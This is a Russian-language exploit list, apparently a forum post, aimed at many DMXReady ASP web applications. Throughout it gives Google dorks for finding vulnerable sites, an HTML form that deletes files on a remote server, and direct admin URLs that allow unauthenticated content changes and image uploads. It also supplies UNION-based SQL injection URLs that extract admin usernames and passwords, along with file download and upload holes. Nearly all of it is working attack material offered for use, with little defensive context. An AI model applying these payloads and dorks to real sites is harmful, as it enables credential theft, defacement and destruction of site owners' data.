DMXReady Scripts
http://www.dmxready.com
Уязвимость: Remote Files Delete Vulnerability
Продукт: DMXReady Blog Manager <= 1.1
Цена: 199.97 $
Dork :
inurl:inc_webblogmanager.asp
PHP код:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>ajann Exp</title>
</head>
<body>
<p>Delete File : )</p>
<p>Form Action: http://target/[path]/includes/shared_scripts/wysiwyg_editor/assetmanager/assetmanager.asp?ffilter=</p>
<form id="form1" name="form1" method="post" action="http://target/[path]/includes/shared_scripts/wysiwyg_editor/assetmanager/assetmanager.asp?ffilter=">
<label>
<input type="hidden" name="inpCurrFolder" value="" />
</label>
<p>
<label>
Delete File Path:
<input type="text" name="inpFileToDelete" value="/shots/index.asp">
</label>
etc..
</p>
<p>
<label>
<input type="submit" name="ff" id="ff" value="Submit" />
</label>
</p>
</form>
<p><br />
</p>
</body>
</html>
Уязвимость: Contents Change Vulnerability
Продукт: DMXReady PayPal Store Manager <= 1.1
Цена: 129.97 $
Dork: inurl:inc_paypalstoremanager.asp
Permissions:
Update
Delete
Insert Category / Sub Category
Image Upload
You Find -> http://[target]/[path]//applications/PayPalStoreManager/inc_paypalstoremanager.asp
Edit -> http://[target]/[path]//admin/PayPalStoreManager/CategoryManager/list.asp
Продукт: DMXReady Photo Gallery Manager <= 1.1
Цена: 39.97 $
Dork: inurl:inc_photogallerymanager.asp
Permissions:
Update
Delete
Insert Category / Sub Category
Image Upload
You Find -> http://[target]/[path]//applications/PhotoGalleryManager/inc_photogallerymanager.asp
Edit -> http://[target]/[path]//admin/PhotoGalleryManager/add_category.asp
Продукт: DMXReady Registration Manager <= 1.1
Цена: 49.97 $
Dork: inurl:inc_registrationmanager.asp
Permissions:
Update
Delete
Insert Category / Sub Category
You Find -> http://[target]/[path]//applications/RegistrationManager/inc_registrationmanager.asp
Edit -> http://[target]/[path]//admin/RegistrationManager/add_category.asp
Продукт: DMXReady BillboardManager <= 1.1
Цена: 49.97 $
Permissions:
Update
Delete
Insert Category / Sub Category
You Find -> http://[target]/[path]//applications/BillboardManager/
Edit ->
http://www.demo.dmxready.com/admin/BillboardManager/add_category.asp
Уязвимость: Remote Contents Change Vulnerability
Продукт: DMXReady Catalog Manager <= 1.1
Цена: 149.97 $
Dork: inurl:inc_catalogmanager.asp
Permissions:
Update
Delete
Insert Category / Sub Category
You Find -> http://[target]/[path]//applications/RegistrationManager/inc_registrationmanager.asp
Edit -> http://[target]/[path]//admin/RegistrationManager/add_category.asp
Продукт: DMXReady Contact Us Manager <= 1.1
Цена: 49.97 $
Dork: inurl:inc_contactusmanager.asp
Permissions:
Update
Delete
Insert Category / Sub Category
Image Upload
You Find -> http://[target]/[path]//applications/ContactUsManager/inc_contactusmanager.asp
Edit -> http://[target]/[path]//admin/ContactUsManager/add_category.asp
Продукт: DMXReady Document Library Manager <= 1.1
Цена: 39.97 $
Dork: inurl:inc_documentlibrarymanager.asp
Permissions:
Update
Delete
Insert Category / Sub Category
Image Upload
You Find -> http://[target]/[path]//applications/DocumentLibraryManager/inc_documentlibrarymanager.asp
Edit -> http://[target]/[path]//admin/DocumentLibraryManager/add_category.asp
Продукт: DMXReady Faqs Manager <= 1.1
Цена: 24.97 $
Dork: inurl:inc_faqsmanager.asp
Permissions:
Update
Delete
Insert Category / Sub Category
Image Upload
You Find -> http://[target]/[path]//applications/FaqsManager/inc_faqsmanager.asp
Edit -> http://[target]/[path]//admin/FaqsManager/add_category.asp
Продукт: DMXReady Job Listing <= 1.1
Цена: 49.97 $
Dork: inurl:inc_joblistingmanager.asp
Permissions:
Update
Delete
Insert Category / Sub Category
Image Upload
You Find -> http://[target]/[path]//applications/JobListingManager/inc_joblistingmanager.asp
Edit -> http://[target]/[path]//admin/JobListingManager/CategoryManager/list.asp
Продукт: DMXReady Links Manager <= 1.1
Цена: 24.97 $
Dork: inurl:inc_linksmanager.asp
Permissions:
Update
Delete
Insert Category / Sub Category
You Find -> http://[target]/[path]//applications/LinksManager/inc_linksmanager.asp
Edit -> http://[target]/[path]//admin/LinksManager/add_category.asp
Уязвимость: SQL Injection Vulnerability
Продукт: DMXReady Classified Listings Manager <= 1.1
Цена: 99.97 $
Dork: inurl:inc_classifiedlistingsmanager.asp
Admin Login: http://[target]/[path]//admin/ClassifiedListingsManager/manage.asp
USERNAME->
Код:
http://[target]/[path]/admin/ClassifiedListingsManager/components/CategoryManager/upload_image_category.asp?cid=5 union select 0,Security_AdminUserName,2,5,9,3 from tblCLM_config
PASSWORD->
Код:
http://[target]/[path]///admin/ClassifiedListingsManager/components/CategoryManager/upload_image_category.asp?cid=5 union select 0,Security_AdminPassword,2,5,9,3 from tblCLM_config
Продукт: DMXReady Member Directory Manager <= 1.1
Цена:99.97 $
Dork: inurl:inc_memberdirectorymanager.asp
Admin Login:
http://[target]/[path]/admin/MemberDirectoryManager/admin.asp
USERNAME->
Код:
http://[target]/[path]/admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=-1231312 union select 6,Security_AdminUserName,4,3,2,1 from tblMDM_config
PASSWORD->
Код:
http://[target]/[path]/admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=-1231312 union select 6,Security_AdminPassword,4,3,2,1 from tblMDM_config
Продукт: DMXReady Members Area Manager <= 1.2
Цена: 149.97 $
Dork: inurl:inc_membersareamanager.asp
Admin Login: http://[target]/[path]/admin/MembersAreaManager/admin.asp
USERNAME->
Код:
http://[target]/[path]/admin/MembersAreaManager/components/SecurityLevelManager/upload_image_security_level.asp?cid=-12312312 union select 1,Security_AdminUserName,3,4,5,6 from tblConfig
PASSWORD->
Код:
http://[target]/[path]/admin/MembersAreaManager/components/SecurityLevelManager/upload_image_security_level.asp?cid=-12312312 union select 1,Security_AdminPassword,3,4,5,6 from tblConfig
Продукт: DMXReady SDK <= 1.1
Уязвимость: Remote File Download Vulnerability
Цена:389.97 $
Код:
http://[target]/path/control_panel/download_link.asp?filename=inc_faqsmanager_qs_jump_menu.asp&filelocation={FILE PATH}
Продукт: DMXReady Secure Document Library <= 1.1
Уязвимость: Remote SQL Injection Vulnerability
Цена:189.97 $
Admin Login:http://[target]/[path]/admin/SecureDocumentLibrary/admin.asp
USERNAME->
Код:
http://[target]/[path]/admin/SecureDocumentLibrary/MembersAreaManager/components/CategoryManager/upload_image_category.asp?cid=-12321 union select 2,Security_AdminPassword,4,5,6,0 from tblConfig
PASSWORD->
Код:
http://[target]/[path]/admin/SecureDocumentLibrary/MembersAreaManager/components/CategoryManager/upload_image_category.asp?cid=-12321 union select 2,Security_AdminPassword,4,5,6,0 from tblConfig
Продукт: DMXReady Billboard Manager <= 1.1
Уязвимость: Remote File Upload Vulnerability
Цена:49.97 $
Dork: inurl:inc_billboardmanager.asp?ItemID=
# http://[target]/[path]/admin/BillboardManager/upload_document.asp?ItemID=[ItemID]
ItemID= 1,2,3,4,5.......
Example:
You Find -> http://[target]/[path]//applications/BillboardManager/inc_billboardmanager.asp
Edit -> http://[target]/[path]//admin/BillboardManager/upload_document.asp?ItemID=[ItemID]
DMXReady BillboardManager <= 1.1 Contents Change Vulnerability find by x0r
all other vulnerability found by ajann